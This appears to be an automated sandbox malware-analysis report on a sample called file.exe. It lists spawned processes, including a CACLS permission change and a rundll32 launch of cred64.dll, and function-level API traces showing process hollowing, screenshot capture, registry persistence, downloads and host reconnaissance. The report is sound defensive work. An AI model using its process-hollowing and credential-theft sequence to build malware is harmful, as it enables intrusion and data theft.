Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 1312, Parent PID: 5268

General

Target ID:	12
Start time:	10:32:19
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\9c69749b54" /P "user:R" /E
Imagebase:	0xb50000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1276, Parent PID: 3332

General

Target ID:	13
Start time:	10:32:20
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main
Imagebase:	0xb0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 204, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	9%
Signature Coverage:	8.4%
Total number of Nodes:	1549
Total number of Limit Nodes:	22

Executed Functions

Function 0041B9E1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0041F030,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA03
TerminateProcess.KERNEL32(00000000,?,0041B9E0,0041BF66,?,0041F030,0041BF66,0041F030), ref: 0041BA0A
ExitProcess.KERNEL32 ref: 0041BA1C

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
Instruction ID: be758b5f3a38b2d93a3fbedb321d5b13915e36e10b2adafe3a414c7c05e9fbd7
Opcode Fuzzy Hash: 3d3398b3f9dcf73c51e1cd00535af5d0e13f2263922661259b1695b405c8b0d4
Instruction Fuzzy Hash: 3BE0B631240108EFCB216F55DC49AA97B79FF45785FD4443AF80696231CB39EDA2CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004043C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteA.SHELL32(00000000,000000FF,?,?,00000000,00000000), ref: 00404454

Strings

runas, xrefs: 00404413

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: runas
API String ID: 587946157-4000483414
Opcode ID: f8419775caa034be66f9eaaefdeaedb4b6375cd623adbc6f2410fdb337acd2b8
Instruction ID: e6e0ab57cb9d62481e4135255265b3591b272f3c45fb97704a701dae2dbdd878
Opcode Fuzzy Hash: f8419775caa034be66f9eaaefdeaedb4b6375cd623adbc6f2410fdb337acd2b8
Instruction Fuzzy Hash: 0441F471200208EBDB08DF29CC42BDD7BB5EB89314F90822EFD15572C1D7799984CB85

Uniqueness

Uniqueness Score: -1.00%

Function 006E466E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006E4696
Module32First.KERNEL32(00000000,00000224), ref: 006E46B6

Memory Dump Source

Source File: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e3000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2702f0f7929d685c6d0e1cb63ce97f7211bbee1cad2916e77fc1c9ff2f558d75
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 41F096311017607BD7203BF6988DBAE77EDAF4A725F100528E646911C0DF70EC454A65

Uniqueness

Uniqueness Score: -1.00%

Function 004236DF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00423398: CreateFileW.KERNELBASE(00000000,00000000,?,00423788,?,?,00000000,?,00423788,00000000,0000000C), ref: 004233B5

GetLastError.KERNEL32 ref: 004237F3
__dosmaperr.LIBCMT ref: 004237FA
GetFileType.KERNELBASE(00000000), ref: 00423806
GetLastError.KERNEL32 ref: 00423810
__dosmaperr.LIBCMT ref: 00423819
CloseHandle.KERNEL32(00000000), ref: 00423839
CloseHandle.KERNEL32(0041E51E), ref: 00423986
GetLastError.KERNEL32 ref: 004239B8
__dosmaperr.LIBCMT ref: 004239BF

Strings

H, xrefs: 00423944

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
Instruction ID: b003a15c628702d40cfbcecca9f7353160345fca733c1857a0ba88a793590157
Opcode Fuzzy Hash: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
Instruction Fuzzy Hash: 5DA12772B001548FCF19EF68EC917AE3BB0AB46315F54016EE811AF391C73C9956CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3F4 Relevance: 7.8, APIs: 5, Instructions: 312
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040B5A5
GetFileAttributesA.KERNELBASE(?), ref: 0040B6CE
CreateDirectoryA.KERNELBASE(?,00000000), ref: 0040B6F0
GetFileAttributesA.KERNELBASE(?), ref: 0040B70B
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B84C

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$Attributes$CopyCreateDirectoryModuleName
String ID:
API String ID: 3597215635-0
Opcode ID: 024742293ffed2c4d1b096372f012befa9f15729bf6a28dbadd2771e5fa00857
Instruction ID: a934ae8864a8a92cf458129f686f6532dc9d655bac45d23393913fe995afb105
Opcode Fuzzy Hash: 024742293ffed2c4d1b096372f012befa9f15729bf6a28dbadd2771e5fa00857
Instruction Fuzzy Hash: ABC1A0B1A001188BDB24DB28CD45BDDB775EB85318F5041EDE608A72D2DB399EC48FAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B320 Relevance: 3.2, APIs: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040B380

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: ea1981e3b141d83fb6103c5473e1a89cfe22a810ca1df3825568cdc430fcf6c5
Instruction ID: bed9f8206c10bc8b9bce4702bc0fd31eb9ca90d6bfc227a2c69e117914f0a7e9
Opcode Fuzzy Hash: ea1981e3b141d83fb6103c5473e1a89cfe22a810ca1df3825568cdc430fcf6c5
Instruction Fuzzy Hash: 4981ADB09042588BEB24DB24CD49BDDBB75EB46308F5041E9D60967282DB791FC8CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 0041D29B Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0041D2E3

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 070986772703c49f61cb72b087b7edc152cdddff0d7a34cc63ab41e9aac740e6
Instruction ID: bc64b5865b7facb123b77b9705bce858cb6c599d8b3197de4276bb24e22b1475
Opcode Fuzzy Hash: 070986772703c49f61cb72b087b7edc152cdddff0d7a34cc63ab41e9aac740e6
Instruction Fuzzy Hash: 2BE0E572E4151046A211663B7C826EA12819BA1335B66036BF830C61E0DE7CC8C3C19E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4DF Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 0041E519

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: f62d859c7d7b0a6acea26fe1d68693355716faee68629b54b87d77f67d7d14cf
Instruction ID: ce8e01f743ae20a0c0fe29bb830e78455a7054db18d70cfb659f0bb38e409b45
Opcode Fuzzy Hash: f62d859c7d7b0a6acea26fe1d68693355716faee68629b54b87d77f67d7d14cf
Instruction Fuzzy Hash: DA114875A0020AAFCF05DF59E9459CB7BF9EF48304F0040AAF809EB351D630DA11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00423651 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 004236B4

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c2b94324b76974fa70c08e77f0004f35c50b01f950a964b6aced5bf47f6222ec
Instruction ID: 3ab1820d02a1fa658bed966c189bcd3389873c348444ff9d80816312c0ac3dbe
Opcode Fuzzy Hash: c2b94324b76974fa70c08e77f0004f35c50b01f950a964b6aced5bf47f6222ec
Instruction Fuzzy Hash: 12017172D0015DBFCF01AFA99C019DE7FB9AB08314F54016ABD14E2251E7398A619B84

Uniqueness

Uniqueness Score: -1.00%

Function 00416920 Relevance: 1.5, APIs: 1, Instructions: 36
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B320: GetTempPathA.KERNEL32(00000104,?), ref: 0040B380

Part of subcall function 0040A800: GetModuleFileNameA.KERNEL32(00000000,?,00000104,E64E1EA0), ref: 0040A83C

Part of subcall function 00406530: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406560

Part of subcall function 00413980: IsUserAnAdmin.SHELL32 ref: 004139DD
Part of subcall function 00413980: GetUserNameA.ADVAPI32(?,?), ref: 00413A87
Part of subcall function 00413980: GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 00413AF0

Part of subcall function 004168D0: CreateThread.KERNEL32 ref: 004168E6
Part of subcall function 004168D0: CreateThread.KERNEL32 ref: 004168F7
Part of subcall function 004168D0: CreateThread.KERNEL32 ref: 00416908
Part of subcall function 004168D0: Sleep.KERNEL32(00007530,?,00416963), ref: 00416915

InternetCloseHandle.WININET(00000000), ref: 00416977

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Name$CreateThread$FileModuleUser$AdminCloseComputerHandleInternetPathSleepTemp
String ID:
API String ID: 1327835013-0
Opcode ID: ce3172d2dd1f93e9426762af1df5d4a2dceb2f79cf41b9e844b715903be985f4
Instruction ID: 471d55ff78aef345f110b23e9f8e19a4b2b64315c001f99601888288eff9d463
Opcode Fuzzy Hash: ce3172d2dd1f93e9426762af1df5d4a2dceb2f79cf41b9e844b715903be985f4
Instruction Fuzzy Hash: 8DE04FB2A1010447CA0437BA5D0779E31184F4030CF90017EB815622D3ED7D896485FF

Uniqueness

Uniqueness Score: -1.00%

Function 00423398 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00423788,?,?,00000000,?,00423788,00000000,0000000C), ref: 004233B5

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5f6f20da4e93aca7bdcb0ea2359822fb329caed46e02a9c52ac097750241beb4
Instruction ID: cd0ee65043cc83d888fb6f456493c6bde9bec702db69a9442c4f6e90f97d0004
Opcode Fuzzy Hash: 5f6f20da4e93aca7bdcb0ea2359822fb329caed46e02a9c52ac097750241beb4
Instruction Fuzzy Hash: 77D06C3210010DFFDF128F84DC06EDA3BAAFB48724F414120BA1856020C732E872EB94

Uniqueness

Uniqueness Score: -1.00%

Function 006E432D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006E437E

Memory Dump Source

Source File: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e3000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 50c2cb180fe986287deb29f78ee9cbfb96b2a0223d10abddf477c8f71c9f2b7c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B2113C79A00208EFDB01DF99C989E98BBF5AF08350F058094F9489B362D771EE50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402C70 Relevance: 53.4, APIs: 28, Strings: 2, Instructions: 910registrywindowfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,E64E1EA0,E64E1EA0), ref: 00402E1C
RegQueryValueExA.ADVAPI32(E64E1EA0,?,00000000,00000000,?,00000400,?,?,00000000,00000001,E64E1EA0,E64E1EA0), ref: 00402E4A
RegCloseKey.ADVAPI32(E64E1EA0,?,?,00000000,00000001,E64E1EA0,E64E1EA0), ref: 00402E56
RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00402F63
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00402F91
RegCloseKey.ADVAPI32(80000001), ref: 00402F9A
GdiplusStartup.GDIPLUS(?,?,00000000,E64E1EA0), ref: 004030CA
GetDC.USER32(00000000), ref: 004031C2
RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00403449
GetSystemMetrics.USER32 ref: 004034A2
GetSystemMetrics.USER32 ref: 004034AB
RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 004034F3
GetSystemMetrics.USER32 ref: 00403546
GetSystemMetrics.USER32 ref: 0040354F
CreateCompatibleDC.GDI32(?), ref: 0040355B
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403570
SelectObject.GDI32(00000000,00000000), ref: 00403580
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004035A6
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 004035BA
GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 004035D6
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00403603
GdipSaveImageToFile.GDIPLUS(00000000,?,?,00000000), ref: 00403687
SelectObject.GDI32(00000000,?), ref: 00403694
DeleteObject.GDI32(00000000), ref: 004036A1
DeleteObject.GDI32(?), ref: 004036A9
ReleaseDC.USER32 ref: 004036B3
GdipDisposeImage.GDIPLUS(00000000), ref: 004036BA
GdiplusShutdown.GDIPLUS(?), ref: 0040375C

Strings

PrMs, xrefs: 00403687
image/jpeg, xrefs: 00403615

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Gdip$ImageMetricsObjectSystemValue$Create$BitmapCloseCompatibleDeleteEncodersGdiplusOpenSelect$DisposeFileFromQueryReleaseSaveShutdownSizeStartup
String ID: PrMs$image/jpeg
API String ID: 406439762-3479922604
Opcode ID: cbad7aefd740635331b2b6a70ce24ac8fd3da5491632943434d52950e8c2462d
Instruction ID: 2fda29453dd7343fb8c030473094154efff91a55b42e6451fe4c8a82b38e2d13
Opcode Fuzzy Hash: cbad7aefd740635331b2b6a70ce24ac8fd3da5491632943434d52950e8c2462d
Instruction Fuzzy Hash: E3620571A001089BEB28DF28CD85BEDBB75EF45304F50826EE405B72D2DB799AC5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00403FB0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 162injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FD6
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040403B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00404054
GetThreadContext.KERNEL32(?,00000000), ref: 0040406F
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00404093
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004040AE
GetProcAddress.KERNEL32(00000000), ref: 004040B5
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004040DD
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004040FE
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00404142
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0040417E
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 0040419A
ResumeThread.KERNEL32(?,?,?,00000000), ref: 004041A6
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 004041B4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004041D5

Strings

ntdll.dll, xrefs: 004040A9
, xrefs: 00404088
NtUnmapViewOfSection, xrefs: 004040A4

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1522589568
Opcode ID: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
Instruction ID: a9cd7b4eca6fd75c363069a252156244f2b8a6c1c24f95c61792526d0bff3807
Opcode Fuzzy Hash: 972d0c6d86e1d51cb3675af836e57fbfae7561e09380802b563b16feb5d3d82b
Instruction Fuzzy Hash: 25517C71640218AFDB219F50DC49FEAB7B4FF48705F9000B6F608AA2D1D7B16995CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004076A0 Relevance: 23.3, APIs: 15, Instructions: 817COMMON

Download Yara Rule

APIs

Part of subcall function 00405EB0: GetTempPathA.KERNEL32(00000104,?,E64E1EA0,00000000), ref: 00405EF7

GetFileAttributesA.KERNEL32(00000000), ref: 00407713

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID:
API String ID: 3199926297-0
Opcode ID: eea6bb1b734c3121222496a57545cd887b208170903fa6436dd80bd7f45252dc
Instruction ID: dec4cfc0129ff26472fd7fa9380305b0dab6103dd60af6cd80f4d959d1863cd7
Opcode Fuzzy Hash: eea6bb1b734c3121222496a57545cd887b208170903fa6436dd80bd7f45252dc
Instruction Fuzzy Hash: 3D62F870E04248DBEF14EBA8CA497DE7BB1AF06314F64416ED450773C2D7791A84CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004041F0 Relevance: 10.7, APIs: 7, Instructions: 165networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00434EFC,00000000,00000000,00000000,00000000), ref: 004042CC
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004042DE
InternetReadFile.WININET(00000000,E64E1EA0,03E80000,03E80000), ref: 004042F1
InternetCloseHandle.WININET(00000000), ref: 00404302
InternetCloseHandle.WININET(00000000), ref: 00404305
InternetCloseHandle.WININET(00000000), ref: 00404313
InternetCloseHandle.WININET(00000000), ref: 00404316

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID:
API String ID: 4294395943-0
Opcode ID: 7cf6284909f286678b431d0b7701e821ebe6460720c72ddbca33a4e3289a406a
Instruction ID: d4460e6594f183dd8fbd5c6a35e334755fb906af117da0c2693caa719dd5e9b3
Opcode Fuzzy Hash: 7cf6284909f286678b431d0b7701e821ebe6460720c72ddbca33a4e3289a406a
Instruction Fuzzy Hash: 1D51C571F00108ABDB14DFA4CC41BEEBB75EF89300F60852EE911B7290D7399945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00424CA6 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00424D28
_free.LIBCMT ref: 00424D4C
_free.LIBCMT ref: 00424ED9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004335D8), ref: 00424EEB
_free.LIBCMT ref: 004250A5

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 55acbcffade6baf4cd24fac65c32f1f8042ce55b1cd6b8e204445f414faf138a
Instruction ID: 0a3dac8c0d2f4ab523d7b0c170e7acef0f0f927e43a4501e6aab2b421f423aab
Opcode Fuzzy Hash: 55acbcffade6baf4cd24fac65c32f1f8042ce55b1cd6b8e204445f414faf138a
Instruction Fuzzy Hash: ECC14571B002649FDB20AF69E841BAB7BA8EF95354F9501AFE540D7381E7388D41CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405470 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,E64E1EA0,00000000), ref: 004054E9
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405550
GetProcAddress.KERNEL32(00000000), ref: 00405557

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 962d5339703cb46b45d1035e38f139a1028016193647132356b397c134aae68c
Instruction ID: d93702cff96d9b86482a03c3b5f1d4bd7b2cac7a22e29a7da7631487a0085e50
Opcode Fuzzy Hash: 962d5339703cb46b45d1035e38f139a1028016193647132356b397c134aae68c
Instruction Fuzzy Hash: 6C512970D006049BDB14EB28DE497DEBB75EB46314F9042BAE809A73C1DB399EC08F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8C0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 630COMMON

Download Yara Rule

Strings

-, xrefs: 0040BED6

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 8ec984269fc204e11f3a00a0022ef8150b4d3cc481596e17900e08606637af1a
Instruction ID: 66d1256024fa6b80d309a6167c314416fb1e0f995a2940995c03682f4c0b35a5
Opcode Fuzzy Hash: 8ec984269fc204e11f3a00a0022ef8150b4d3cc481596e17900e08606637af1a
Instruction Fuzzy Hash: CB5270B0D041589BEF65DB24CD897CDBBB5AB52308F5081E9D409272C2DB791FC88F9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB60 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0041CC58
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0041CC62
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0041CC6F

Memory Dump Source

Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d01e7f133785e3bb0beafcf269aef2531f9dd5a62572b740f5956f5575e894ef
Instruction ID: 6e0a840d613f948629d69306ea8559204aa93db5cd8eb08d912f64573995077d
Opcode Fuzzy Hash: d01e7f133785e3bb0beafcf269aef2531f9dd5a62572b740f5956f5575e894ef
Instruction Fuzzy Hash: B531A2749412189BCB21DF65DD89BD9BBB8AF08310F5041EAE41CA7291EB749F858F48

Uniqueness

Uniqueness Score: -1.00%

